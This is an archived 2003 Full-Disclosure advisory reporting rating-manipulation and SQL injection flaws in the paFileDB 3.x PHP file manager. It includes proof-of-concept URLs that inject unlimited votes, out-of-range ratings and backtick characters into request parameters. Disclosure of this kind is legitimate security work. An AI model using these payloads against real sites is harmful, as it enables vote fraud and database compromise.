[Full-Disclosure] paFileDB 3.x SQL Injection Vulnerability

From: flur (flur@flurnet.org)
Date: 03/24/03

  • Next message: Gerardo Richarte: "Re: [Full-Disclosure] Microsoft runs early April Fools ad" 
    To: full-disclosure@lists.netsys.com
From: flur <flur@flurnet.org>
Date: Mon, 24 Mar 2003 10:57:56 -0500

    Flurnet Security
    ----------------
    paFileDB by todd@phparena.net
    PHP Arena http://www.phparena.net

    Tested on:
             paFileDB 3.0 Final
             paFileDB 3.0 Beta 3.1
             paFileDB 3.1 Final

    Explanation:

    paFileDB is a file management script that supports user file rating. It
    uses an SQL database backend. Multiple vulnerabilities exist due to the
    lack of checked input variables. The following exploits exist:
      - Modified 'id' tag allows users to submit unlimited ratings.
      - Hand-edited 'rating' tag allows users to submit ratings above 10 or
    below 0.
      - Both tags do not check for escape characters and will allow SQL injection.

    Proof-Of-Concept Exploits:

    http://target/pafiledb/pafiledb.php?action=rate&id=1[RANDOM]&rate=dorate&rating=10
    Replace [RANDOM] with a random short string and the script will not be stop
    you from voting as many times as you like.

    http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=1000
    Submit file rating of 1000 out of 10. Drive rate up. Conversely, -1000
    would have the opposite effect driving the rating down.

    http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
    http://target/pafiledb/pafiledb.php?action=rate&id=`&rate=dorate&rating=10
    SQL Injection vulnerability (exploit code not included)

    Script authors have been notified.

    ____________________ __ _
    ~FluRDoInG flur@flurnet.org
                                 http://www.flurnet.org
    KEY ID 0x8C2C37C4 (pgp.mit.edu) RSA-CAST 2048/2048
    1876 B762 F909 91EB 0C02 C06B 83FF E6C5 8C2C 37C4

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Gerardo Richarte: "Re: [Full-Disclosure] Microsoft runs early April Fools ad"

    Relevant Pages

    • paFileDB 3.x SQL Injection Vulnerability
      ... paFileDB is a file management script that supports user file rating. ... - Both tags do not check for escape characters and will allow SQL injection. ... Replace with a random short string and the script will not be stop ... Submit file rating of 1000 out of 10. ...
      (Bugtraq)
    • Re: [FEX] What do you thing about a beta test section in the FEX ?
      ... So indeed the file exchange contains beta test software, ... I'll vote for deletion if I see what ... to give a rating, then I'll give it an N/A rating. ... Even if it is not good style, a script for instance ...
      (comp.soft-sys.matlab)
    • Re: mysql and php script in fp
      ... E Web Express - Web Design & Hosting ... What is the rating app that you are ... Do you have a URL for the script developer that we can look at? ... I've gone into phpmyadmin and created a database called ...
      (microsoft.public.frontpage.client)
    • DataList, Repeater, or Data Grid?
      ... I am resurrecting an old script from a previous programmer, ... migrate it over to asp.net from classic asp. ... horses name, the gate position, speed rating, other aux info). ... is in relation with tblhorseentry and tbltrack. ...
      (microsoft.public.dotnet.framework.aspnet)
    • Re: Need advice on user ratings table
      ... it will have a lot of users and a lot of transactions rating users, ... decided to de-normalize the data for performance. ... -- into TotalPositives If the rating was negative, ... Links for SQL Server Books Online: ...
      (microsoft.public.sqlserver.programming)